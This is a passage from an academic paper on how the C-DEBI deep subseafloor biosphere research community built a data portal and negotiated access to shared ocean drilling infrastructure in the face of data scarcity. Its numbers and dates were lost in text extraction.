research community’’ (edwards, : ), little was accomplished toward this goal in the first two years of operation. the first five-year strategic implementation plan – claimed ‘‘technical difficulty’’ as the barrier to establishing the data management infrastructure (center for dark energy biosphere investigations, ; ). however, by , data management infrastructure became part of the work of c-debi. this plan stresses that the ‘‘c-debi stc is committed to open access for all information and data gathered during scientific research that is conducted as part of c-debi’’ (center for dark energy biosphere investigations, a: ). starting in , c-debi responded to new nsf requirements by mandating that participating scientists must make data publicly available after a moratorium, typically two years. c-debi developed their data management strategy as part of their application for renewal of nsf funding for the second five-year period, – . the most critical strategic challenge for c-debi during its first years of operation was to navigate this nsf renewal process successfully. the c-debi data portal, comprising a registry and repository, is a central element of c-debi’s strategic goals for their second five-year project (center for dark energy biosphere investigations, a). c-debi requires participating teams to register all associated datasets darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. that support published results on the portal, and to deposit them in a relevant, online, publicly accessible database. the portal contains metadata about each dataset, including details about the provenance of the cores used (including the name of the research site, the cruise number, and the specific drill hole(s) where the samples originated), and a link to the dataset if it is hosted externally. in mid- , c-debi assembled a team to build the data portal, which included one co-pi, a scientific database expert from another c-debi institution, and the c-debi administrative assistant. since the center’s inception, the administrative assistant had responsibility for building and maintaining the c-debi project website. his job was expanded to include leading the development of the data portal. c-debi allocated substantial funding to portal development: $ , in and an additional $ , for (center for dark energy biosphere investigations, b). the first phase, which included prototyping and site architecture, was completed for the nsf visit to c-debi in january . subsequently, the job title of the administrative assistant was changed to data manager, reflecting the shift in the importance to c-debi of data management infrastructure from a marginalized aspiration to a central goal. alternative approaches to single-domain infrastructure the existence of the data portal, and the form it takes, is only partially determined by nsf requirements. to determine the degree to which the form of c-debi data management infrastructure is driven by nsf data management requirements, we examined how other nsf science and technology centers have addressed these requirements. c-debi is one of current stcs, all of which are subject to nsf data release requirements. however, the stcs interpret these requirements in a variety of ways. hence, only three of the other ten stcs operate an online, publicly-accessible registry or repository to make these data accessible, whether by downloading datasets, by providing links to other sources, or by providing contact information for people associated with datasets (center for coastal margin observation & prediction, ; center for microbial oceanography research and education, a; center for remote sensing of ice sheets, ). the data registries or repositories of these stcs vary in the types of datasets they contain and in the scope of metadata they capture about each dataset. the center for microbial oceanography research and education, or c-more, is the stc most scientifically comparable to c-debi, in that they study microbial ecology in the ocean and scientists use samples collected from ocean research cruises operated directly by c-more. c-debi is distinguished from other stcs with online data infrastructure by requiring the most comprehensive set of metadata for datasets in its registry and repository. for example, while both the c-debi and c-more registries have a category to name the research cruise from which each dataset was derived (center for microbial oceanography research and education, b), c-debi also has a category for the precise geographic location from where the sample was drawn. another example is that the c-debi registry has metadata categories detailing the publication(s) in which a particular dataset has been used; by contrast, the c-more registry does not. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the current stcs have implemented the nsf requirements in different ways, despite their scientific and organizational similarities. in other words, the existence of the nsf requirements do not completely account for what data management policies or infrastructure are implemented by c-debi, nor do they account for the specific form and function of these policies and infrastructure. shared infrastructure and community building iodp/iodp expeditions are the primary source of physical samples and data used in the onshore laboratories of the deep subseafloor biosphere researchers we studied. some scientists also participate in cruises operated by other organizations (university- national oceanographic laboratory services, ). however, these non-iodp/iodp cruises usually revisit sites drilled during previous iodp/iodp expeditions. international ocean drilling programs iodp/iodp is infrastructure, consisting of ships, scientific equipment and personnel, and an organizational structure shared between the deep subseafloor biosphere community and several other domains. consequently, these domains compete for scarce resources. their representatives are involved in decision-making processes within iodp/iodp about the scope of their programmatic research and the organization of specific cruises. the expansion of iodp scientific activities to include deep subseafloor biosphere research required other domains to concede some of their share of iodp resources. while our c-debi participants generally reported a collegial atmosphere among scientists on iodp/iodp cruises, many deep subseafloor biosphere researchers nevertheless encounter resistance, such as objections to the number of cores allocated to deep subseafloor biosphere researchers: ‘‘we encounter resistance [from other domains] when we apply to sail. we encounter it when we apply for sample requests. we encounter it when we set up for post-cruise fundings, and also for regular grant writing.’’ (c-debi faculty, # ) increased competition for places on cruises is but one of the ways in which other domains concede resources to accommodate research about the deep subseafloor biosphere. a wider variety of domains also compete for allocation of cores, the precious sources of physical and microbiological data from cruises. initial decisions made on board the ships determine the core’s value to these competing communities. the most critical initial decision for the microbiology community is the temperature at which cores are stored. while samples for physical analysis are typically stored at − ◦c, samples for microbiological analysis are typically stored at − ◦c to avoid contamination and to stabilize biological material. other handling decisions include the ways in which the cores are cut and distributed to participating scientific teams. the number of cores per cruise is finite, therefore producing more cores suitable for microbiological analysis results in fewer cores suitable for physical science analysis: ‘‘what you do with this core you just split these one meter sections lengthwise, open it up so you have two halves of it.... for microbiology and geochemistry you do it somewhat differently. you take the core, you’re not cutting it up lengthwise but you cut out short darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. sections...so you lose the entire stratigraphic information from that core.’’ (c-debi faculty, # ) the allocation of cores to research teams requires intensive negotiation. pre-cruise meetings to negotiate allocations result in a sampling plan for the voyage. during a cruise, sampling plans frequently are adapted to changing conditions and to the relative success of core sampling, leading to further negotiation of resources: ‘‘sometimes ...we don’t receive that much [biological] core material. sometimes you may have a small piece and people want something from the small piece so then that has to go through iterations of compromise.’’ (iodp curator, # ) as a new area of science, a particular challenge for deep subseafloor biosphere researchers is their own methodological diversity. the lack of agreement within the deep subseafloor biosphere research community on standard practices for data handling works against them in negotiating for more cores. as discussed in more depth elsewhere (darch & sands, ), workflows to characterize microbiological communities in cores vary significantly, even between scientists working on adjacent benches in the same laboratory. scientists from other domains sometimes use this variation to argue against allocation of cores to deep subseafloor biosphere researchers, as one of our interviewees encountered: ‘‘those that are competing with us for sediment material, the hard rocks guys, the sedimentologists, those guys that are then lobbying for the same sediment samples that we’re going after, they can turn to us and say, ‘well, you know what, if we handed you half of this and you half of this, you guys would come back with two different datasets, so what’s the point of handing it to any of you because you guys can’t describe it in the same way anyway?’ ’’ (c-debi faculty, # ) as iodp approached the end of its funding period in , concerns arose among stakeholders about continued government funding for scientific ocean drilling cruises, and indeed, funding was reduced for iodp’s successor, iodp (committee on guidance for nsf on national ocean science research priorities: decadal survey for ocean sciences, ). however, the physical infrastructure (cruise ships, core repositories, data management systems) of iodp is largely that of iodp. in addition to maintaining their position within iodp , deep subseafloor biosphere researchers also aspire to secure more resources for deep subseafloor biosphere research in the future. one aspiration is to produce more standardized data on board the ocean drilling cruises, akin to the standardized set of analyses of physical properties that are routinely conducted and made publicly available through an iodp database. as no comparable set of standards exists for the microbiological properties, cruises neither conduct nor report basic microbiological descriptions of cores. many of the c-debi-affiliated scientists interviewed mentioned this lack of agreement around standardized methods as a serious constraint on their scientific progress (orcutt et al., ). instead, individual scientists devote much effort to basic microbiological analyses in their home laboratories. the time and expense of basic description limits the resources available to conduct more advanced analyses, as explained by one of our interviewees: darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ‘‘post-expeditions awards provide $ , worth of support for up to two years, for you to do the research that you proposed to do while you were at sea ...the difference between what we can use that money for, and say what a sedimentologist can use that money for, is grossly different. because a sedimentologist, the geochemist, the petrologist, the paleo-mag guys, all of them pretty much have all the data. and so, they’re looking at the $ , as seed money to maybe do some analysis that they maybe pay for a grad student, maybe pay for a technician, maybe pay for somebody’s time, to analyze it, to maybe take it another di- rection...for the biologist, we have $ , to now process all of our samples, do all the se- quence analysis, do the bulk labor of all of our work on the equipment that we already have to have in our lab versus what everybody else is using on the ship.’’ (c-debi faculty, # ) however, to include microbiological description of cores on board all cruises would require major reconfiguration of existing cruise practices. these practices were established over many years before microbiology’s inclusion in cruises: ‘‘it took them decades to come up with the system... standard protocols, standard proce- dures, standard storage. it makes it a little bit rigid like i said, when you do something new and novel, like the living things don’t really have a place yet.’’ (c-debi faculty, # ) consequently, attempts to change iodp practices in support of deep subseafloor biosphere research would require a significant amount of effort and would diminish the resources available for more physical science-oriented domains in iodp . to date, these attempts have faced considerable resistance: ‘‘geochemical and geophysical research objectives represented on iodp expeditions are routinely provided by dedicated shipboard scientists and technicians assigned to completing standard procedures on all core material. the call for an additional biological workload on these individuals is typically met with an argument claiming a lack of time and resources on board.’’ (orcutt et al., , p. ) one of our interviewees told us that much of the resistance from these physical scientists is that, ‘‘as a community [of deep subseafloor researchers], we can’t agree on anything’’ regarding methodology. while this resistance on the part of physical science disciplines appears to be motivated by a fear of losing iodp resources, their arguments are that the lack of standardization of microbiological workflows means that microbiological analyses cannot be included as part of the workflow on iodp cruises. consequently, many c-debi scientists recognize that the deep subseafloor biosphere community must undertake the work necessary to standardize microbiological workflows. infrastructure convergence the development of the c-debi data management infrastructure can be understood in the light of the aspirations of deep subseafloor biosphere researchers to improve exploitation of currently-available resources from iodp/iodp cruises, and to reconfigure iodp infrastructure to secure a greater share of drilling cruise resources. those developing c-debi infrastructure are working towards three goals: better curation and circulation of darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. extant data; building a community with norms of open data; and explicating the roles of iodp/iodp data in c-debi research. here we examine how c-debi is addressing these three goals, and how the goals both shape, and are shaped by, the relationships between c-debi and iodp/iodp infrastructure. improving curation of extant data the first goal of the c-debi data management infrastructure is to improve the curation, circulation, and accessibility of data handled by the deep subseafloor biosphere researchers. at a project workshop held in that brought together many leading members of c-debi, ‘‘encouragement of data sharing ...was identified as an important priority’’ (center for dark energy biosphere investigations, b, p. ). despite the scarcity of cores and of resources to analyze them, deep subseafloor biosphere researchers often do not take the steps necessary to preserve these data beyond the short-term or to make them easily accessible to fellow members of their domain. this situation is compounded by disparate policies and uneven provision of community databases across the scientific disciplines involved in deep subseafloor biosphere research. scientists who publish in most microbiological journals are required to deposit genomic sequence data supporting their conclusions to publicly accessible databases such as genbank (benson et al., ), although these databases do not cover the full range of microbiological data produced by deep subseafloor biosphere scientists. no similar requirement to deposit exists for complementary physical science data. some appropriate databases do exist but contributions of data are at the discretion of the scientist, and occur rarely, as illustrated by this quotation: ‘‘nowadays they won’t publish your work if it has molecular [biology] data and it’s not in the database somewhere...there are now databases where you could, i guess, submit this type of data like the geological data. but i haven’t started doing that yet.’’ (c-debi postdoctoral researcher, # ) the c-debi data portal is intended to provide a home for these microbiological data. at one level, the goal of improved curation, accessibility, and circulation of data can be understood as a desire to increase the amount of scientific work accomplished from the limited amount of cores and data currently available. however, this goal also can be understood in terms of pursuing longer-term strategic objectives of the deep subseafloor biosphere community. standardized approaches will support data integration and meta- analyses, for example. better data curation will enable ‘‘our community to develop and recommend broad standards’’ (center for dark energy biosphere investigations, b, p. ), in turn helping to promote some of the methodological standardization necessary to address the criticisms of physical science researchers. deep subseafloor biosphere researchers have promoted standardized methods as a means to advance hypothesis-driven science and replicability (teske et al., ). they expect better replicability to address concerns about the status of their field. the belief that methods for deep subseafloor biosphere research should be standardized was far from unanimous, however. as explored in more depth in darch ( ), some darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. members view methodological heterogeneity as a key strength of the domain, with researchers from diverse disciplinary backgrounds bringing new methods to bear on research questions. a particular concern is that standardizing methods of this emergent domain is premature, and will foreclose possibilities for more efficient or reliable methods in the future. although these debates are ongoing, proponents of standardization hold key decision-making positions within c-debi. consequently, the design of c-debi data infrastructure promotes methods standardization. community building since c-debi’s conception, project leadership recognized the potential of data infrastructure to link distributed scientists (edwards, ). in particular, the c-debi data portal is intended to ‘‘support the connection among scientists and others in ...c-debi’’ (center for dark energy biosphere investigations, a, p. ). the portal is an important element to sustain and expand the community beyond the project’s anticipated end in , given that years is the maximum nsf stc funding. as one of our interviewees explains, ‘‘the web-based database for the entire subseafloor biosphere community will be an important legacy of c-debi’s contribution’’ (c-debi management, # ). c-debi hopes that its data portal will emulate other successful scientific databases that began as project-specific endeavors and became institutionalized with subsequent funding. however, c-debi does not merely seek to build a community through its data management infrastructure; it also seeks to foster particular norms among community members, notably a collaborative ethos predicated on openness and sharing of knowledge and knowledge products. as a consequence of this design and policy, scientists who do not conform to the norms of openness and data sharing are likely to be excluded. in turn, by fostering openness norms, data will be more widely available and exploited more fully. the norms are not ends in themselves, but intended to address scientific and strategic goals of studies of the deep subseafloor biosphere to obtain the needed volume and variety of data. furthermore, c-debi also hopes that by helping to foster and strengthen an enduring community of researchers, their project’s legacy will ensure continued strength in advocating for deep subseafloor biosphere’s role in iodp . explicating iodp/iodp contributions to c-debi given the resistance from physical science disciplines, and in light of future uncertainties around funding, deep subseafloor biosphere researchers must demonstrate that their inclusion in scientific ocean drilling cruises has resulted in scientifically valuable output. by demonstrating scientific value, they hope to secure continued iodp resources and to reconfigure iodp infrastructure in their favor. articles in scholarly journals demonstrate scientific productivity, but do not necessarily highlight the essential or precise contributions of iodp data to their findings. subseafloor biosphere research reports tend to integrate data from multiple sources, including cruises conducted under the auspices of organizations other than iodp/iodp . journal articles also report analyses of data derived in laboratory conditions that are based on cores or on instruments in drill holes left by those cores. the challenge facing the c-debi community, therefore, is to make more explicit the relationship between their own scientific output, iodp/iodp cruises, and other kinds of darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data. one way in which c-debi is addressing this challenge is by assigning appropriate categories of metadata in its data portal. these categories include information about the origin of the cores from which the data have been derived, such the name of the research site, the cruise number, and the specific drill hole(s) where the samples originated. such metadata serves several purposes. one is to improve the provenance of the data, which enhances replicability. another is to improve integration of data from multiple sources. a longer-term benefit is to provide evidence that deep subseafloor biosphere researchers can use in negotiations with iodp , both to gain more access to cruises and to reconfigure iodp practices in describing biological characteristics of cores. the need to demonstrate the value of iodp/iopd to c-debi research thus motivates the development of the c-debi data portal and the choices of metadata categories. discussion deep subseafloor biosphere researchers faced data scarcity, which they addressed by attempting to increase the volume and variety of data available to them. the entire research area emerged in the late s and early s when scientific data about the subseafloor became a viable goal. as more data became available, strategies for growing their research base evolved. this community continues to seek more data as a means to accomplish science at faster rates. as they matured as a community, they became increasingly concerned about their scientific status in relation to studies of microbial ecology in other environments. they altered their strategy for advancement accordingly (kragh, ; lenoir, ; paul, ). here, we explicate two broad themes that emerge from our case study. the first is data scarcity—what it means for a scientific domain to experience data scarcity, what the implications are for its status, and how the domain addresses this scarcity. the second is the politics of knowledge infrastructures. a scientific domain may build and configure infrastructure specific to itself and also infrastructure shared with other domains. data scarcity terms like ‘‘big data’’ and ‘‘little data’’ are commonly employed to denote the scale of data to which scientific domains have access (borgman, ). ‘‘data scarcity’’ is a more poignant term as it suggests a state that is unsatisfactory for a domain’s practitioners (sawyer, ). the degree of data scarcity can be understood only in relation to that domain’s scientific objectives. as emergent scientific domains such as the deep subseafloor biosphere struggle to survive and thrive, they must attract resources to support researchers and infrastructure. to justify support for public funding in highly competitive environments, scientific domains must demonstrate their utility by contributing to one or both of the following: . issues of major political and social concern (mukerji, ), such as those relating to the environment, agriculture, and national defense; . existential questions about humanity, such as the origins and evolution of life, and the origins and extent of the universe (bowler & morus, ). c-debi makes both claims: study of the deep subseafloor biosphere will contribute significantly to understanding the effects of global environmental change, and to the darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. origins and evolution of life. the deep subseafloor biosphere domain faces data scarcity because it aspires to pursue its scientific objectives in a more statistically intensive manner than is afforded by the data to which it currently has access. for instance, domain scientists would like to answer questions about the global distribution of microbes, which is essential to understanding the role of the deep subseafloor biosphere in important environmental processes. to answer these questions, scientists must be able to perform meta-analyses that involve aggregating datasets about the size and composition of microbial communities in many different sites of the ocean. at present, insufficient data currently exists to make accurate estimates about the global distribution of microbes. leaders of the deep subseafloor biosphere community wish to shift the research emphasis from discovery to hypothesis-driven science, bringing their domain into line with other domains of microbiology. hypothesis-driven science, involving statistical methods to test hypotheses, is generally regarded as more scientifically credible than discovery-driven science (lenoir, ; paul, ). these scientists wish to test the effects of environmental changes on the ability of different types of microbes to survive and thrive. others wish to study microbes’ abilities to survive and adapt to extreme conditions, such as those that may have been present when life on earth began. knowledge infrastructures our account of c-debi infrastructure is enriched by understanding relationships between this single-domain infrastructure and the complexities of iodp/iodp , and by examining how infrastructure negotiations influence access to resources. we observe a mutual shaping of the single-domain and shared infrastructure, driven by the deep subseafloor biosphere researchers’ desire to address their data scarcity. the case presented in this paper contributes to studies of knowledge infrastructures (edwards, ; edwards et al., ) in two respects. first, although infrastructure components often are shared and negotiated between multiple domains, surprisingly few studies have paid close attention to the difficulties of sharing infrastructural resources (benson, ; ribes & bowker, ; ribes & finholt, ). our study pays close attention to how scientists from the deep subseafloor biosphere have negotiated a share of scarce resources of iodp/iodp , thus extending research on negotiating shared infrastructure. second, very few studies offer accounts of how an infrastructure emerges in relation to other infrastructures upon which a domain may depend. the case presented in this article is an exemplar of configurations of knowledge infrastructure common to many domains of science. here, the knowledge infrastructure of the deep subseafloor biosphere includes a major component shared with other domains, and another major component that it wholly controls. further, this case demonstrates how building a single-domain infrastructure unfolds both in response to, and as a significant intervention in, the configuration of shared infrastructure. although building the single-domain c-debi infrastructure may appear intended to provide immediate resources to scientists, it is also a means to access a greater portion of the shared infrastructure of iodp/iodp . darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. how domains share or build their own infrastructures infrastructural approaches are commonly used to gain access to data resources, and to facilitate shifts toward more data-intensive epistemologies (bowker, ; bowker, ; chow-white & garcía-sancho, ). scientific domains can engage in infrastructure- building activities to increase opportunities for producing, analyzing, aggregating, accessing, circulating, and long-term curating of data. existing studies suggest these activities follow one of two strategies. the strategy most widely studied involves a domain that builds infrastructure intended exclusively for itself. the second strategy, documented in a few studies, involves a domain that constructs infrastructure to share with other domains, either by building new multi-domain infrastructure or by negotiating access to extant infrastructure that already serves other domains (benson, ; ribes & bowker, ; ribes & finholt, ). one contribution of our study is to demonstrate that a single scientific domain may pursue both strategies simultaneously. the deep subseafloor biosphere scientists constructed infrastructure specific to the domain (c-debi and its data portal) and negotiated greater access to infrastructure shared with other domains (ocean drilling programs such as iodp/iodp ). the single-domain c-debi infrastructure was built in response to the constraints and opportunities of the multi-domain iodp/iodp infrastructure. when multiple domains share infrastructure, they compete for elements of design and operation that serve their needs, such as choices of what data are to be collected and what standards are to be applied. infrastructure is built on an installed base, so that adaptations are both afforded and constrained by the configurations of extant infrastructure (star & ruhleder, ). hence, when a scientific domain first seeks access to an infrastructure controlled by other domains, they may need to adapt their scientific practices accordingly (benson, ). this was the situation faced by deep subseafloor biosphere scientists in gaining access to the iodp/iodp infrastructure, which had established procedures for collecting, curating, and accessing samples and data; for ship-based facilities; and had favored geographic locations for scientific ocean-drilling cruises. these pre-existing practices helped to shape and constrain the scientific research opportunities of deep subseafloor biosphere scientists. one way to acquire more data is to distribute funding accordingly. other studies have observed cases where infrastructure is designed to increase data production (lenoir & hays, ; strauss, ) or to coordinate distributed sites of data collection (aronova, baker & oreskes, ). the motivations of c-debi are similar, with top priority assigned to exploiting cores whose allocation between domains is hotly contested. a second way to maximize scientific work is to aggregate and integrate existing data more effectively (leonelli & ankeny, ; meyer, ), for instance by embedding common standards within or across domains (bowker, ; leonelli & ankeny, ) or by building links between members of the domain and fostering norms of data sharing and openness across this domain (kelty, ; leonelli, ). the c-debi data infrastructure exists to foster collaboration among other deep subseafloor biosphere researchers, and to assemble and circulate data produced by distributed domain scientists. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. building and converging infrastructures the single-domain c-debi infrastructure was designed in response to scarce iodp/iodp resources for deep subseafloor biosphere science. however, c-debi also can be understood as a means to negotiate a greater share of the iodp/iodp infrastructure. negotiations between domain representatives are a typical feature of projects to build shared infrastructure (ribes & bowker, ; ribes & finholt, ). ribes & finholt ( ) focus on the importance of defining and representing the interests of the communities involved. c-debi, and its associated data infrastructure, exemplifies such a strategy. it was formed to build a strong, enduring community that speaks with one voice, creating a larger presence of deep subseafloor biosphere scientists in iodp negotiations. one way that c-debi increases the domain’s status is by making explicit the contribution of iodp/iodp resources to their research. the c-debi data portal, and the choices of metadata categories, provide evidence that deep subseafloor biosphere researchers can use to negotiate further involvement in iodp . a second way is to enable meta-analyses and cross-comparisons of methods that promote methodological standardization across the domain, with the goal of making microbiological workflows standard practice on future cruises. this standardization, in turn, is deemed necessary by many c-debi scientists to reconfigure how iodp cruises operate in the future, and thus to secure more data for their community. our case also demonstrates how relationships between single-domain and multi-domain infrastructure change over time. the infrastructure studied by (ribes & finholt, ), namely waters, fell apart even before it began its scientific operations. our study, on the other hand, exposes how the configuration of c-debi, and the priorities of those building c-debi infrastructure, has shifted. in the early years of c-debi, distributing grants to enable data production and to recruit more scientists into the community was very much the priority. over time, c-debi’s priorities changed, following from experiences in negotiating with other domains for resources during the three biosphere-focused iodp expeditions in and . biosphere scientists realized both that standardizing microbiological workflows and making explicit how they are using cores to produce data are critical challenges for acquiring more data from future drilling cruises. in turn, this awareness promoted a greater focus of c-debi on building and configuring online data management infrastructure. single-domain infrastructure is subject to change and reconfiguration as domain scientists gain more experience of, and become increasingly sophisticated operators in, using shared infrastructure. in turn, these shifts will change the configurations of resources available to scientists as they seek to go about their day-to-day work. conclusions scientists in many fields are concerned with increasing access to data as a means to advance their scientific work, to increase access to resources, and to enhance their status in the larger scientific community. many scientific domains have addressed these concerns through infrastructural strategies. very often, these strategies involve sharing infrastructure with other domains, whether this infrastructure is built anew, such as in the case of the large darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. synoptic survey telescope, or is gained by membership in other infrastructures, as in the case of the deep subseafloor biosphere and iodp/iodp . even when funding and data seem abundant, as in lsst, resources may be scarce and must be contested between domains. in many cases, scientific domains will participate in shared infrastructure and in domain- specific infrastructure. in this article, we explored how the deep subseafloor biosphere community pursued an infrastructural approach to addressing data scarcity. their data scarcity can be understood as a response to the challenges they face as an emergent domain in demonstrating their ability to contribute credibly to issues of critical social importance and interest. both independent and shared infrastructures proved essential to this community’s creation and maturation. further, we identified the mutual shaping of these shared and independent infrastructures. the independent infrastructure was built both in response to, and as an intervention in, the configuration of the shared infrastructure. we continue to study infrastructure, data management, and standards processes in the deep subseafloor biosphere research community—in particular as infrastructure continues to evolve in light of c-debi’s successful renewal in —and in astronomy to advance our understanding of relationships between infrastructure and epistemological practices (borgman et al., ). in this article, we focus on the relationships between shared and domain-specific infrastructures and the difficulties of sharing infrastructures. the deep subseafloor biosphere community continues to evolve. current pressures to standardize methods reveal the significant challenges in ensuring that this community can act as a single, strong, and united entity in negotiating access to shared infrastructure (darch, ). relationships between shared and domain-specific infrastructures should be studied across a wider range of scientific endeavors, as points of friction often reveal deeper truths about scientific practice (borgman et al., ; edwards et al., ). acknowledgements this article is based in part on a paper presented at association for information science and technology (asis&t) annual meeting , ship space to database: motivations to manage research data for the deep subseafloor biosphere (darch & borgman, ). we acknowledge the contributions of milena golshan, irene pasquetto, ashley e. sands, sharon traweek, and jillian wallis for commenting on earlier drafts of this paper, and to rebekah cummings for assistance with conducting the case study. we are deeply grateful to those c-debi and iodp/iodp personnel who we interviewed and observed at work. additional information and declarations funding research reported here has been supported by two grants from the sloan foundation award: # (the transformation of knowledge, culture and practice in data- driven science: a knowledge infrastructures perspective, christine l. borgman, pi, sharon traweek, co-pi, ucla); and # (if data sharing is the answer, what is the question?, christine l. borgman, ucla, subcontract to peter t. darch, university of darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. il at urbana-champaign). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: sloan foundation award: # , # . competing interests christine l. borgman is on the academic advisory board for peerj computer science. author contributions • peter t. darch conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • christine l. borgman conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): ucla north general institutional review board irb# - -cr- . data availability the following information was supplied regarding data availability: the data in this article is human subjects data, and cannot be released given their sensitive nature and the infeasibility of de-identification. references aronova e, baker ks, oreskes n. . big science and big data in biology: from the international geophysical year through the international biological program to the long term ecological research (lter) network, –present. historical studies in the natural science ( ): – doi . /hsns. . . . . baker ks, jackson sj, wanetick jr. . strategies supporting heterogeneous data and interdisciplinary collaboration: towards an ocean informatics environment. in: proceedings of the th annual hawaii international conference on system sciences, . hicss ’ . b– b. beaulieu a. . research note: from co-location to co-presence: shifts in the use of ethnography for the study of knowledge. social studies of science ( ): – doi . / . benson da, cavanaugh m, clark k, karsch-mizrachi i, lipman dj, ostell j, say- ers ew. . genbank. nucleic acids research (database issue):d –d doi . /nar/gks . darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /hsns. . . . http://dx.doi.org/ . / http://dx.doi.org/ . /nar/gks http://dx.doi.org/ . /peerj-cs. benson e. . one infrastructure, many global visions: the commercialization and diversification of argos, a satellite-based environmental surveillance system. social studies of science ( ): – doi . / . bietz mj, lee cp. . collaboration in metagenomics: sequence databases and the organization of scientific work. in: wagner i, tellioğlu h, balka e, simon c, ciolfi l, eds. ecscw . london: springer, – . borgman cl. . big data, little data, no data: scholarship in the networked world. cambridge: the mit press. borgman cl, darch pt, sands ae, pasquetto iv, golshan ms, wallis jc, traweek s. . knowledge infrastructures in science: data, diversity, and digital libraries. international journal on digital librariex ( – ): – doi . /s - - -z. borgman cl, wallis jc, enyedy n. . little science confronts the data deluge: habitat ecology, embedded sensor networks, and digital libraries. international journal on digital libraries ( – ): – doi . /s - - - . borgman cl, wallis jc, mayernik ms, pepe a. . drowning in data: digital library architecture to support scientific use of embedded sensor networks. in: joint conference on digital libraries. vancouver: association for computing machinery, – . bowker gc. . biodiversity datadiversity. social studies of science ( ): – doi . / . bowker gc. . memory practices in the sciences. cambridge: mit press. bowler pj, morus ir. . making modern science: a historical survey. chicago: university of chicago press. c-more. a. center for microbial oceanography research and education. available at http://cmore.soest.hawaii.edu (accessed on july ). c-more. b. c-more / data. available at http://cmore.soest.hawaii.edu/datasearch/ data.php (accessed on july ). ceccarelli l. . shaping science with rhetoric: the cases of dobzhansky, schrodinger, and wilson. chicago: university of chicago press. center for dark energy biosphere investigations. . c-debi strategic implemen- tation plan, – . available at http:// . . . /internal/docs/c-debi_sip_ sep.pdf. center for dark energy biosphere investigations. . center for dark energy biosphere investigations stc annual report . available at http://www. darkenergybiosphere.org/wp-content/uploads/docs/ c-debi_annualreport_ noapp.pdf. center for dark energy biosphere investigations. a. c-debi data management philosophy and policy. available at http://www.darkenergybiosphere.org/internal/ docs/c-debidatamanagementplan_ draft.pdf. center for dark energy biosphere investigations. b. c-debi ‘‘activity’’ theme team workshop—report. available at http://www.darkenergybiosphere.org/wp- content/uploads/docs/ c-debiactivity_workshopreport.pdf. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://cmore.soest.hawaii.edu http://cmore.soest.hawaii.edu/datasearch/data.php http://cmore.soest.hawaii.edu/datasearch/data.php http:// . . . /internal/docs/c-debi_sip_ sep.pdf http:// . . . /internal/docs/c-debi_sip_ sep.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/ c-debi_annualreport_noapp.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/ c-debi_annualreport_noapp.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/ c-debi_annualreport_noapp.pdf http://www.darkenergybiosphere.org/internal/docs/c-debidatamanagementplan_ draft.pdf http://www.darkenergybiosphere.org/internal/docs/c-debidatamanagementplan_ draft.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/ c-debiactivity_workshopreport.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/ c-debiactivity_workshopreport.pdf http://dx.doi.org/ . /peerj-cs. center for dark energy biosphere investigations. a. c-debi strategic implemen- tation plan – . available at http:// . . . /internal/docs/c-debi_sip_ - .pdf. center for dark energy biosphere investigations. b. c-debi ‘‘activity’’ theme team workshop—report. bigelow laboratory for ocean sciences & ocean point inn, east boothbay. me: c-debi. available at http://www.darkenergybiosphere.org/ wp-content/uploads/docs/ _c-debi_activity_workshop_report.pdf. center for dark energy biosphere investigations. a. cdp. available at http://cdp. darkenergybiosphere.org. center for dark energy biosphere investigations. b. center for dark energy biosphere investigations stc annual report . available at http://www. darkenergybiosphere.org/wp-content/uploads/docs/c-debi-annual-report- .pdf. center for dark energy biosphere investigations. . c-debi-funded projects. available at http://www.darkenergybiosphere.org/research-activities/funded-projects/ (accessed on july ). chow-white pa, garcía-sancho m. . bidirectional shaping and spaces of conver- gence interactions between biology and computing from the first dna sequencers to global genome databases. science, technology & human values ( ): – doi . / . cmop. . center for coastal margin observation & prediction. available at http: //www.stccmop.org (accessed on july ). committee on the review of the scientific accomplishments and assessment of the potential for future transformative discoveries with us-supported scientific ocean drilling. . scientific ocean drilling: accomplishments and challenges. washington, d.c.: national academies press. cresis. . center for remote sensing of ice sheets. available at http://www.cresis.ku. edu (accessed on july ). darch pt. . many methods, many microbes: methodological diversity and standard- ization in the deep subseafloor biosphere. in: iconference proceedings. available at https://www.ideals.illinois.edu/handle/ / . darch pt, borgman cl. . ship space to database: motivations to manage research data for the deep subseafloor biosphere. in: proceedings of the th annual meeting of the association for information science and technology. seattle. available at http: //www.asis.org/asist /proceedings/submissions/papers/ paper.pdf . darch pt, borgman cl, traweek s, cummings rl, wallis 